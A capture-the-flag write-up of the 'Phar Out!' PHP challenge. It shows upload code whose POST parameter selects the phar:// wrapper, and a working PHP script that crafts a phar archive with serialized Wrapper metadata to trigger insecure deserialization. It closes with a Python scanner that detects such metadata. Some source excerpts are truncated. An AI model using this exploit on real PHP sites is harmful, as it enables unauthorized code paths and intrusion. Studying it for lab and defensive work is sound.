Tags: phar php deserialization
We were given the source code of a PHP application.
**index.php**
```
<html>
<head>
<title>Phar Out!</title>
</head>
<body>
Upload a file, and I'll hash it with MD5 :-)
0)
{
$dest_dir = getcwd() . "/uploads/";
echo "
Submitted
";
$target_file = $dest_dir . basename($_FILES["the_file"]["name"]);
//print_r($_FILES);
move_uploaded_file($_FILES["the_file"]["tmp_name"], $target_file);
if ($_POST['s'] === 'p')
$s = 'phar://';
else
$s = 'file://';
echo md5_file("$s$target_file");
unlink($target_file);
}
?>
</body>
</html>
```
**wrapper.php & doit.php**
```
doit)) {
$this->doit = new Doit();
} else {
echo "Hello from Wrapper!";
}
}
}
?>
```
The challenge's title, **Phar out**, points straight at the vulnerability: [**insecure phar deserialization**](https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2019/06/26/exploiting_php_phar-PRD7.html).
Analyzing the source code, the objective is to POST a crafted phar archive and get the Wrapper class instantiated with its `$doit` property set to some value.
As `$doit` is a private class variable, we cannot simply use `$wrapper->doit='some value'`. We can, however, use PHP's [ReflectionClass](https://www.php.net/manual/en/class.reflectionclass.php) to set a value for `$doit`.
The final exploit code:
```
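<?php
// The challenge's Wrapper class (wrapper.php) must be loaded before this runs.
$dummy = new Wrapper();
// set the private property $this->doit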
$reflectionClass = new ReflectionClass('Wrapper');
$reflectionProperty = $reflectionClass->getProperty('doit');
$reflectionProperty->setAccessible(true);
$reflectionProperty->setValue($dummy, 'foobar');
// craft phar archive
$poc = new Phar("poc.phar");
$poc->startBuffering();
$poc->setStub("<?php __HALT_COMPILER(); ?>");
$poc->setMetadata($dummy);
$poc->stopBuffering();
```
By submitting the generated `poc.phar` and setting the POST parameter `s=p` we can get the flag.
```
<html>
<head>
<title>Phar Out!</title>
</head>
<body>
Upload a file, and I'll hash it with MD5 :-)
Submitted
flag{scooby}
</body>
</html>
```
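From the defender's side, the metadata that triggers this behaviour can be inspected before anything opens an upload through `phar://`. The following is an added example, not part of the original writeup or the challenge code: it parses the native phar manifest (tar- and zip-based phars are not handled) and reports the class names of serialized objects in the metadata. The function names and the sample archive are constructed for illustration.

```python
import re
import struct

HALT = b"__HALT_COMPILER();"
# serialize() object tokens: O:<len>:"Class": and C:<len>:"Class": (heuristic match)
OBJECT_TOKEN = re.compile(rb'[OC]:\d+:"([^"]+)":')
# Constructed sample: serialize() output for a Wrapper with private $doit = 'foobar'
SAMPLE_META = b'O:7:"Wrapper":1:{s:13:"\x00Wrapper\x00doit";s:6:"foobar";}'


def phar_metadata(data: bytes):
    """Return the serialized global metadata of a phar-format archive,
    or None if `data` does not parse as one."""
    pos = data.find(HALT)  # search the whole file; the extension proves nothing
    if pos < 0:
        return None
    pos += len(HALT)
    # The stub may close with " ?>" plus an optional line ending.
    tail = re.match(rb"[ \n]\?>(?:\r\n|\n)?", data[pos:pos + 5])
    if tail:
        pos += tail.end()
    try:
        # manifest length, file count, API version, global flags, alias length
        manifest_len, _files, _api, _flags, alias_len = struct.unpack_from(
            "<II2sII", data, pos)
        meta_off = pos + 18 + alias_len
        (meta_len,) = struct.unpack_from("<I", data, meta_off)
    except struct.error:
        return None
    meta = data[meta_off + 4:meta_off + 4 + meta_len]
    # manifest_len counts everything after its own four bytes
    if len(meta) != meta_len or 18 + alias_len + meta_len > manifest_len:
        return None
    return meta


def scan_upload(data: bytes):
    """Class names of serialized objects in the archive's metadata. PHP before
    8.0 unserializes this metadata when the file is opened through phar://."""
    meta = phar_metadata(data)
    return [] if meta is None else [c.decode("latin-1") for c in OBJECT_TOKEN.findall(meta)]


def build_sample(meta: bytes) -> bytes:
    """Constructed test input: minimal phar with no file entries and no signature."""
    body = struct.pack("<I2sIII", 0, b"\x11\x00", 0, 0, len(meta)) + meta
    return b"<?php __HALT_COMPILER(); ?>\r\n" + struct.pack("<I", len(body)) + body
```

A non-empty result from `scan_upload` is a reason to reject the upload outright. The more fundamental fix in `index.php` is to never let a request parameter choose the stream wrapper.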
Awesome, bro?